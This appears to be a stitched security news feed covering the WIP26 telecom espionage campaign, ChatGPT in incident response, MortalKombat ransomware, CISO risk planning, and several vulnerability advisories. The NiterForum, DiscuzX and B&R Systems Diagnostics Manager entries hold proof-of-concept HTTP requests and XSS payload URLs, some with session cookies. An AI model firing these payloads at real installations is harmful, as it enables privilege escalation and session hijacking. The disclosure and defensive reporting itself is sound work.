Telecommunication service providers in the Middle East are being targeted by a previously undocumented threat actor as part of a suspected espionage-related campaign.
Cybersecurity firms SentinelOne and QGroup are tracking the activity cluster under the former's work-in-progress moniker WIP26.
"WIP26 relies heavily on public cloud infrastructure in an attempt to evade detection by making

Cloud Security / Cyber Threat

Telecommunication service providers in the Middle East are being targeted by a previously undocumented threat actor as part of a suspected espionage-related campaign.

Cybersecurity firms SentinelOne and QGroup are tracking the activity cluster under the former's work-in-progress moniker **WIP26**.

"WIP26 relies heavily on public cloud infrastructure in an attempt to evade detection by making malicious traffic look legitimate," researchers Aleksandar Milenkoski, Collin Farr, and Joey Chen said in a report shared with The Hacker News.

This includes the misuse of Microsoft 365 Mail, Azure, Google Firebase, and Dropbox for malware delivery, data exfiltration, and command-and-control (C2) purposes.

The initial intrusion vector used in the attacks entails "precision targeting" of employees via WhatsApp messages that contain links to Dropbox links to supposedly benign archive files.

The files, in reality, harbor a malware loader whose core feature is to deploy custom .NET-based backdoors such as CMD365 or CMDEmber that leverage Microsoft 365 Mail and Google Firebase for C2.

"The main functionality of CMD365 and CMDEmber is to execute attacker-provided system commands using the Windows command interpreter," the researchers said. "This capability was used to conduct a variety of activities, such as reconnaissance, privilege escalation, staging of additional malware, and data exfiltration."

CMD365, for its part, works by scanning the inbox folder for specific emails that begin with the subject line "input" to extract the C2 commands for execution on the infected hosts. CMDEmber, on the other hand, sends and receives data from the C2 server by issuing HTTP requests.

Transmitting the data – which comprises users' private web browser information and details about high-value hosts in the victim's network – to actor-controlled Azure instances is orchestrated by means of PowerShell commands.

The abuse of cloud services for nefarious ends is not unheard of, and the latest campaign from WIP26 indicates continued attempts on the part of threat actors to evade detection.

This is also not the first time telecom providers in the Middle East have come under the radar of espionage groups. In December 2022, Bitdefender disclosed details of an operation dubbed **BackdoorDiplomacy** aimed at a telecom company in the region to siphon valuable data.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Threat Actor WIP26 Targeting Telecom Service Providers in the Middle East

Incident response triage and software vulnerability discovery are two areas where the large language model has demonstrated success, although false positives are common.

A number of experiments suggest that ChatGPT, the popular large language model (LLM), could be useful to help defenders triage potential security incidents and find security vulnerabilities in code, even though the artificial intelligence (AI) model was not specifically trained for such activities, according to results released this week.

In a Feb. 15 analysis of ChatGPT's utility as an incident response tool, Victor Sergeev, incident response team lead at Kaspersky, found that ChatGPT could identify malicious processes running on compromised systems. Sergeev infected a system with the Meterpreter and PowerShell Empire agents, took common steps in the role of an adversary, and then ran a ChatGPT-powered scanner against the system.

The LLM identified two malicious processes running on the system, and correctly ignored 137 benign processes, potentially reducing overhead to a significant degree, he wrote in a blog post describing the experiment.

"ChatGPT successfully identified suspicious service installations, without false positives," Sergeev wrote. "For the second service, it provided a conclusion about why the service should be classified as an indicator of compromise."

Security researchers and AI hackers have all taken an interest in ChatGPT, probing the LLM for weaknesses, while other researchers, as well as cybercriminals, have attempted to lure the LLM to the dark side, setting it to produce better phishing emails messages or generate malware.

    

ChatGPT found indicators of compromise with some false positives. Source: Kaspersky

Yet security researchers are also looking at how the generalized language model performs on specific defense-related tasks. In December, digital forensics firm Cado Security used ChatGPT to create a timeline of a compromise using JSON data from an incident, which produced a good — but not totally accurate — report. Security consultancy NCC Group experimented with ChatGPT as a way to find vulnerabilities in code, which it did, but not always accurately.

The conclusion is that security analysts, developers, and reverse engineers need to take care whenever using LLMs, especially for tasks outside the scope of their capabilities, says Chris Anley, chief scientist at security consultancy NCC Group.

"I definitely think that professional developers, and other folks who work with code should explore ChatGPT and similar models, but more for inspiration than for absolutely correct, factual results," he says, adding that "security code review isn't something we should be using ChatGPT for, so it's kind of unfair to expect it to be perfect first time out."

**Analyzing IoCs With AI**

The Kaspersky experiment started with asking ChatGPT about several hackers' tools, such as Mimikatz and Fast Reverse Proxy. The AI model successfully described those tools, but when requested to identify well-known hashes and domains, it failed. The LLM could not identify a well-known hash of the WannaCry malware, for example.

The relative success of identifying malicious code on the host, however, led Kasperky's Sergeev to ask ChatGPT to create a PowerShell script to collect metadata and indicators of compromise from a system and submit them to the LLM. After improving the code manually, Sergeev used the script on the infected test system.

Overall, the Kaspersky analyst used ChatGPT to analyze the metadata for more than 3,500 events on the test system, finding 74 potential indicators of compromise, 17 of which were false positives. The experiment suggests that ChatGPT could be useful for collecting forensics information for companies that are not running an endpoint detection and response (EDR) system, detecting code obfuscation, or reverse engineering code binaries.

Sergeev also warned that inaccuracies are a very real problem. "Beware of false positives and false negatives that this can produce," he wrote. "At the end of the day, this is just another statistical neural network prone to producing unexpected results."

In its analysis, Cado Security warned that ChatGPT typically does not qualify the confidence of its results. "This is a common concern with ChatGPT that OpenAI \[has\] raised themselves — it can hallucinate, and when it does hallucinate, it does so with confidence," Cado's analysis stated.

**Fair Use and Privacy Rules Need Clarifying**

The experiments also raise some critical issues regarding the data submitted to OpenAI's ChatGPT system. Already, companies have started taking exception to the creation of datasets using information on the Internet, with companies such as Clearview AI and Stability AI facing lawsuits seeking to curtail their use of their machine learning models.

Privacy is another issue. Security professionals have to determine whether submitted indicators of compromise expose sensitive data, or if submitting software code for analysis violates a company's intellectual property, says NCC Group's Anley.

"Whether it's a good idea to submit code to ChatGPT depends a lot on the circumstances," he says. "A lot of code is proprietary and is under various legal protections, so I wouldn't recommend that people submit code to third parties unless they have permission to do so."

Sergeev issued a similar warning: Using ChatGPT to detect compromise sends sensitive data to the system by necessity, which could be a violation of company policy and may present a business risk.

"By using these scripts, you send data, including sensitive data, to OpenAI," he stated, "so be careful and consult the system owner beforehand."

ChatGPT Subs In as Security Analyst, Hallucinates Only Occasionally

Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 1.30.0 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges.

    

**Kimai - time-tracker**

Kimai is a professional grade time-tracking application, free and open-source. It handles use-cases of freelancers as well as companies with dozens or hundreds of users. Kimai was build to track your project times and ships with many advanced features, including but not limited to:

JSON API, invoicing, data exports, multi-timer and punch-in punch-out mode, tagging, multi-user - multi-timezones - multi-language (over 30 translations existing!), authentication via SAML/LDAP/Database, two-factor authentication (2FA) with TOTP, customizable role and team permissions, responsive design, user/customer/project specific rates, advanced search & filtering, money and time budgets, advanced reporting, support for plugins and so much more.

**Versions**

There are two versions of Kimai existing:

*   Version 1 — compatible with PHP 7.4, which is in maintenance mode since 2023
*   Version 2 — stable and "almost released" (waiting for some major plugins, which are not yet migrated)

**Links**

*   Home — Kimai project homepage
*   Blog — Read the latest news
*   Documentation — Learn how to use Kimai

**Requirements**

*   PHP 8.1 minimum
*   MariaDB or MySQL
*   A webserver and subdomain (subdirectory is not supported)
*   PHP extensions: gd, intl, json, mbstring, pdo, tokenizer, xml, xsl, zip

**Installation**

*   Recommended setup — with Git and Composer
*   Docker — containerized by @tobybatch

There are also documentations for:

*   developer setups — on your local machine
*   shared hostings — the least favorable option
*   Synology — you could try to host the Docker version instead
*   1-click installer — hosted environments

And if you don't want to host Kimai, you can use the Cloud version of it.

**Updating Kimai**

*   Update Kimai — get the latest version
*   UPGRADING guide — version specific steps

**Plugins**

*   Plugin marketplace — find existing plugins here
*   Developer documentation — how to create a plugin

**Roadmap and releases**

You can see a rough development roadmap in the Milestones sections. It is open for changes and input from the community, your ideas and questions are welcome.

Release versions will be created on a regular basis, every couple of weeks latest. Every code change, whether it's a new feature or a bugfix, will be done on the main branch.

For the time being and until 2.0 is widely adopted, the 1.x branch will receive bug fixes.

**Contributing**

You want to contribute to this repository? This is so great! The best way to start is to open a new issue for bugs or feature requests or a discussion for questions, support and such.

In case you want to contribute, but you wouldn't know how, here are some suggestions:

*   Spread the word: More user means more people testing and contributing to Kimai, which in turn means better stability and more and better features. Please vote for Kimai on any software platform, you can toot or tweet about it, share it on LinkedIn, Reddit or any of your favorite social media platforms. Every bit helps!
*   Answer questions: You know the answer to another user's problem? Share your knowledge.
*   Something can be done better? An essential feature is missing? Create a feature request.
*   Report bugs makes Kimai better for everyone.
*   You don't have to be programmer, the documentation and translation could always use some attention.
*   Sponsor the project: free software costs money to create!

There is one simple rule in our "Code of conduct": Don't be an ass!

**Credits**

Kimai is based on modern technologies and frameworks such as PHP, Symfony and Doctrine, Bootstrap and Tabler, and countless others.

CVE-2020-19825: GitHub - kimai/kimai: Kimai is a web-based multi-user time-tracking application. Works great for everyone: freelancers, companies, organizations - everyone can track their times, generate reports, cre

An issue was discovered in NiterForum version 2.5.0-beta in /src/main/java/cn/niter/forum/api/SsoApi.java and /src/main/java/cn/niter/forum/controller/AdminController.java, allows attackers to gain escalated privileges.

**Vulnerability Details****Any registered user**

code:  
/NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83：

    @ResponseBody//@ResponseBody返回json格式的数据
    @RequestMapping(value = "/register", method = RequestMethod.POST)
    public Object register(HttpServletRequest request,
                        @RequestParam("name") String name,
                        @RequestParam("password") String password,
                        @RequestParam("type") Integer type,
                        HttpServletResponse response) {
        //1为手机号，2为邮箱号
        ResultDTO resultDTO = (ResultDTO)userService.register(type,name,password);
        if(200\==resultDTO.getCode()){
            Cookie cookie = cookieUtils.getCookie("token",""+resultDTO.getData(),86400\*3);
            response.addCookie(cookie);
        }
        return resultDTO;
    }

Any user can add users through this interface  

return：  
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}  
query database，successfully added：  

**Add administrator without authority**

at  
NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136：

    @PostMapping("/user2588/setAdmin/id")
    @ResponseBody
    public Map<String,Object\> setQuestionById(HttpServletRequest request,
                                              @RequestParam(name = "id",defaultValue = "0") Long id) {

        UserDTO user = (UserDTO)request.getAttribute("loginUser");
        //UserAccount userAccount = (UserAccount) request.getSession().getAttribute("userAccount");
        if (user == null) {
            throw new CustomizeException(CustomizeErrorCode.NO\_LOGIN);
        }
        Map<String,Object\> map  = new HashMap<>();
        UserAccount userAccount = new UserAccount();
        userAccount.setGroupId(19);
        UserAccountExample userAccountExample = new UserAccountExample();
        userAccountExample.createCriteria().andUserIdEqualTo(id);
        if(userAccountMapper.updateByExampleSelective(userAccount,userAccountExample)==1){
            map.put("code",200);
            map.put("message","恭喜您，设置成功！");
        }
        return map;

    }
}

This interface does not perform permission verification, and any user can access it after logging in.  

**POC:****Any registered user**

POST /api/sso/register HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0  
Accept: _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 40  
Origin: http://127.0.0.1:8080  
Connection: close  
Referer: http://127.0.0.1:8080/sso/register  
Cookie:  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

name=123@123.com&password=123456&type=2

**Add administrator without authority**

POST /api/sso/register HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0  
Accept: _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 40  
Origin: http://127.0.0.1:8080  
Connection: close  
Referer: http://127.0.0.1:8080/sso/register  
Cookie:  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

name=123@123.com&password=123456&type=2

CVE-2022-38935: There is a vulnerability that can add the administrator account · Issue #25 · yourkevin/NiterForum

Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

By Habiba Rashid
Hackers are deploying the MortalKombat ransomware and Laplas Clipper malware in a financially motivated campaign against victims worldwide.
This is a post from HackRead.com Read the original post: New MortalKombat Ransomware Attack Aiming for Crypto Wallets

The ransomware encrypts all files on the infected system, including those in the trash bin and virtual machine files. It corrupts Windows Explorer, deletes folders and files from the start-up menu, and disables the Run Command.

Cisco’s Talos cybersecurity team has been tracking an unidentified threat actor behind a ransomware campaign that uses a variant of the Xorist commodity ransomware MortalKombat, as well as a GO variant of the **Laplas Clipper malware**.

The detailed advisory by Talos states that, once a computer is infected, it displays a Mortal Kombat 11 wallpaper along with a note instructing the victim to contact the attackers using **qTox**. For your information, qTox is an instant messaging app that is available for download via GitHub.

The email claims that the user’s payment has timed out and carries an attachment, which contains the malicious payload in a zipped file with a name that appears to be a CoinPayments transaction number.

Upon opening the attachment, a **multi-stage attack chain** is initiated, during which the actor delivers either malware or ransomware. The ransomware encrypts all files on the infected system, including those in the trash bin and virtual machine files. It corrupts Windows Explorer, deletes folders and files from the start-up menu, and disables the Run Command.

In case the email attachment drops Laplas Clipper alternatively, the victim’s **cryptocurrency wallet is targeted**. The malware monitors the computer’s clipboard for cryptocurrency wallet addresses.

If one is found, it is sent to the attacker’s server, where a Clipper bot creates a lookalike address owned by the hacker and then replaces the clipboard entry. This, according to Cisco Talos’ **blog post**, allows the threat actors to receive the funds that the user attempts to transfer into their own wallet.

> “The loader script will run the dropped payload as a process in the victim’s machine, then delete the downloaded and dropped malicious files to clean up the infection markers.”
> 
> _Cisco Talos Intelligence Group_

The campaign has reportedly been targeting individuals, small businesses, and large corporations alike in the United States, England, Turkey, and the Philippines.

The best way to protect yourself from being affected by **similar ransomware campaigns** is to be wary of suspicious emails from services you use. Until you ensure that the email you received is from a legitimate entity, it is highly advised that you do not click on any attachments.

Keeping the nature of this ransomware campaign in mind, Cisco Talos also encouraged companies to remain vigilant when performing cryptocurrency transactions.

1.  **Ransomware asks users to play Click Me game**
2.  **Ransomware tells users to play Japanese game**
3.  **New ransomware asks victims to play PUBG game**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

New MortalKombat Ransomware Attack Aiming for Crypto Wallets

2022 saw a record number of cyberattacks. In response, regulators are prescribing how companies should manage their risks. How do you prepare?

In 2022, we saw a large number of cyberattacks and breaches that affected both companies and countries, driven primarily by accelerating innovation by threat actors and continued diversification of the threat actor economy. While many technical responses have been proposed, the policy responses pose a more challenging issue, as companies will need to comply with public policy decisions despite challenging macroeconomic conditions and a persistent lack of skilled professionals to work on cybersecurity.

In short, 2023 will be the year of risk.

**1\. Anticipate org chart changes and more collaboration with the C-suite.**

Pending regulatory changes require that the CISO be independent, and this independence will likely require organizational chart changes, as CISOs have historically reported to the CIO, CTO, or another senior executive with a background in technology.

This frequently creates an implicit conflict of interest when budgets and staffing considerations arise, as the incentives of the CIO or other senior executives do not necessarily align with the goals of the CISO. In 2023, CISOs should prepare to be adequately independent and have good visibility into the management of cyber-risk. Being independent includes the responsibility of setting staffing and budgets for approval by a committee, rather than providing a cybersecurity budget line item as part of another senior executive's larger budget for the year.

**2\. Be ready to answer more risk-related questions from the board …**

Boards want to have more oversight of cyber-risk. In 2023, organizations should plan on inviting their CISO to a board meeting (and to be somewhat forgiving of that first meeting with those CISOs who come from a technical background). While not all board members need to understand cybersecurity, all CISOs (or CIOs, or whoever presents to the board) need to be able to speak to the board in the language of risk to effectively communicate status, learn about larger initiatives, and ask for assistance or perspective when needed. Although this will be a new requirement for publicly traded companies, privately held companies should strongly consider adopting this new change to reporting.

**3\. … and as a result, be more diligent about communicating risk.**

Companies should track the risk of noncompliance and be able to describe their risk management plans associated with noncompliance. Depending on the specific regulatory body, civil and criminal penalties are potential outcomes, as well as congressional hearings or reputational damages.

Companies that have DFARS requirements — particularly those with CMMC level 2 control requirements — hold the dual risks of noncompliance leading to denial of future Department of Defense contracts as well as the potential of whistleblowers under the False Claims Act. As a result, CISOs will need to be consistent and persistent about communicating the status of their risk and compliance posture.

**4\. CISOs will need to invest in internal assessments as more security breaches hit the news.**

Cybersecurity breaches were a hot topic in 2022, with several high-profile cases making national headlines. For example, the Federal Trade Commission (FTC) sought action against online alcohol marketplace Drizly — and its CEO, Cory Rellas — for cybersecurity failures affecting over 2.5 million consumers. Notably, the FTC specifically named and sanctioned Rellas — a new move for the governing body. This change in posture may indicate a larger shift toward enforcement at the FTC, particularly for organizations that don’t have adequate controls around the protection and disposition of consumer data.

One lesson carries across these stories: the importance of effective internal assessments, as they are critical tools to find weaknesses in your security program and assuring that those weaknesses are fixed. We predict a sharp increase in investigations with adversarial discovery in 2023 as companies watch these major news stories play out in real-time.

**5\. SMBs should consider increasing security control monitoring to avoid cyberattacks.**

Smaller companies are more vulnerable to cyberattacks, but why? Simply put, they don’t have the budget or resources to combat ransomware attacks, which is why they are a high priority for threat actors.

More controls in place means more processes for maintaining those controls, which results in more manual processes that IT security professionals must handle. For example, SMBs will need to map out the GDPR compliance legalese to controls for breach notifications, or quickly finding CIS Control Group 3 to help with data disposal.

IT, security, and risk management professionals will need to better collect and organize their evidence in preparation for applications and renewals of their cyber insurance policies. They might also consider a tool that enables them to link risks to controls to decide how much coverage they actually need.

**About the Author**

    

Kayne McGladrey, CISSP, is the field CISO for Hyperproof and a senior member of the IEEE. He has over two decades of experience in cybersecurity and has served as a CISO and advisory board member, and focuses on the policy, social, and economic effects of cybersecurity lapses to individuals, companies, and the nation.

2023 Is the Year of Risk: 5 Ways to Prepare

B&R Systems Diagnostics Manager versions above or equal to 3.00 and below or equal to C4.93 suffer from a cross site scripting vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20230214-0 >  
=======================================================================  
               title: Multiple XSS Vulnerabilities  
             product: B&R Systems Diagnostics Manager  
  vulnerable version: >=3.00 and <=C4.93  
       fixed version: >=D4.93  
          CVE number: CVE-2022-4286  
              impact: medium  
            homepage: https://www.br-automation.com  
               found: 2022-10-28  
                  by: S. Robertz (Office Vienna)  
                      G. Hechenberger (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Our slogan is our mission. The pursuit of Perfection in Automation has  
inspired and guided B&R for over 40 years. To us, perfection means more  
than developing the best solutions in industrial automation. It also means  
developing the best relationships – with our customers and partners as  
well as our employees and suppliers.

Keen foresight and entrepreneurial courage helped us rise quickly into  
the ranks of top global players in industrial automation. An intuitive sense  
of market dynamics and emerging trends has established us as a pioneer,  
leading the way with the most innovative technology on the market.

Our role as the ABB Group's global center for machine and factory automation  
strengthens our position of leadership and adds new momentum to our  
impressive record of sustained growth."

Source: https://www.br-automation.com/en/about-us/

Business recommendation:  
------------------------  
The vendor provides a software update which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286)  
An attacker can execute arbitrary JavaScript code in the context of the  
victim's session, thus perform all actions, exfiltrate information, etc.  
In order to exploit this vulnerability the attacker will have to trick  
the user into visiting a manipulated URL.

Proof of concept:  
-----------------  
1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286)  
The following URL has to be visited by the victim in order to execute  
arbitrary JavaScript code.

http://<PLC-IP>/sdm/cgiFileLoop.cgi?service=javascript:alert(document.domain);%2f%2f&type=512&scope=%3Cfile:///etc/passwd%3E&module=Snapshot&option=3

A very similar vulnerability can be found at another endpoint of the  
System Diagnostic Manager (SDM).

http://<PLC-IP>/sdm/svg.cgi?type=cpuusage&index=1%3Cscript%3Ealert(document.domain)%3C/script%3E

Vulnerable / tested versions:  
-----------------------------  
The following device and firmware version has been tested:  
* B&R X20CP3687X SwModuleVersion 186

According to the vendor, all B&R Automation Runtime (AR) versions >=3.00 and <=C4.93  
are affected.

Vendor contact timeline:  
------------------------  
2022-11-21: Contacting vendor through cybersecurity@br-automation.com.  
             Sent encrypted advisory.  
2022-11-22: Vendor requests B&R Automation Runtime version.  
2022-12-01: Vendor confirms vulnerability. Will be fixed with next release.  
             Asking for timeline.  
2022-12-13: Advisory and patch will be published on 2023-02-10.  
             Vendor offers to share the advisory for review purposes.  
2023-01-25: Reviewing vendor advisory, receiving CVE + affected/fixed version  
             numbers  
2023-02-10: Vendor provides the patch.  
2023-02-14: Coordinated release of security advisory.

Solution:  
---------  
The vendor supplies a patch, which should be installed immediately.  
The following version mitigates the identified XSS issues:  
* B&R Automation Runtime version >=D4.93

The vendor has published the following security advisory:  
https://www.br-automation.com/downloads_br_productcatalogue/assets/1675607299099-en-original-1.0.pdf

Workaround:  
-----------  
Administrators can deactivate the System Diagnostics Manager in case it is not  
needed.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
EOF S. Robertz, G. Hechenberger / @2023

B&R Systems Diagnostics Manager Cross Site Scripting

Red Hat Security Advisory 2023-0651-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution esigned for on-premise or private cloud deployments.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.27 security update  
Advisory ID:       RHSA-2023:0651-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0651  
Issue date:        2023-02-15  
CVE Names:         CVE-2021-4238 CVE-2022-47629   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.27 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution esigned for on-premise or private  
cloud deployments.

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other elated information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Networking Day 1 - Bootstrap Doesn't Get External IP when no DHCP Server  
(BZ#2048600)

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at:

https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:65e71a774a18c1c191f28655ce245abeecd653e8215b75f87eb23ceadacd530d

(For s390x architecture)  
The image digest is  
sha256:cfccfab6abf7cd74cffbc43e4ae38745f258cb28ff6360b0f433c7718d6f144b

(For ppc64le architecture)  
The image digest is sha256:  
e13089586d2061a41250e2b546259bef0c5c4995c704d0e2220ae516a1a675da

(For aarch64 architecture)  
The image digest is  
sha256:932754cfa58f41186a48ecff03c6345c59325fc7ff1496e91e57fa34752db142

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at:  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2048600 - Networking Day 1 - Bootstrap Doesn't Get External IP when no DHCP Server  
2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-3507 - [4.11.z] Incorrect network configuration in worker node with two interfaces  
OCPBUGS-4340 - oc get dc fails when AllRequestBodies audit-profile is set in apiserver  
OCPBUGS-5459 - Topology sidebar actions doesn't show the latest resource data  
OCPBUGS-5926 - NMstate removes egressip in OpenShift cluster with SDN plugin  
OCPBUGS-6176 - Tracker: Configure ignored namespaces into multus-admission-controller (4.11)  
OCPBUGS-6683 - [4.11]Improve Pod Admission failure for restricted-v2 denials that pass with restricted   
OCPBUGS-6837 - Add rpm-build to DTK image  
OCPBUGS-6907 - Image registry Operator does not use Proxy when connecting to openstack  
OCPBUGS-6920 - Tracker: Configure ignored namespaces into multus-admission-controller (4.11,CNO)  
OCPBUGS-7033 - 4.11 error 524 from seccomp(2) when trying to load filter [rhel-8.6.0.z]   
OCPBUGS-7034 - 4.11 [iavf] It takes long time to create multiple VF interfaces and the VF interface names are not consistent [rhel-8.6.0.z]

6. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+zQA9zjgjWX9erEAQjY7Q//YWMAWAjecEvTomhKUA2d5zlkZ+5x85ce  
DRlz4l1m8INyBt6/6P7H03ahzq/3v50Zxr+SRL9trJS1V9VS9vD/n+YaIFr65gbG  
FivmQwH4tBNVjmxG4Lhn5Al87xXyJbvUHX3SRoluj1C7k8UHZBw2uhXo1bS7SHq7  
+K6e/+nXR2UroGdkDU/kB6xpMwSKE0pJrVo/xpaD9QgzGjtVXmbL3b0USEUeU3w1  
grQKknqqu7ItZaV3MgcA5DxDlOdl896Btd6/T/2RG20P2Zrf77LM5cAssiwwbDF7  
FzuU6Ve8i1oEAvHZlJjrqJyVMwF9oDjBlEdcjJKTTrpn3VeHVnEjv7l0eHcbGSsU  
kB1CpMC2UA/uQD3QDZhCpWUfybej3zuhY40lxmz5Tf/NKduX6J8uOb+0RdSYsVWr  
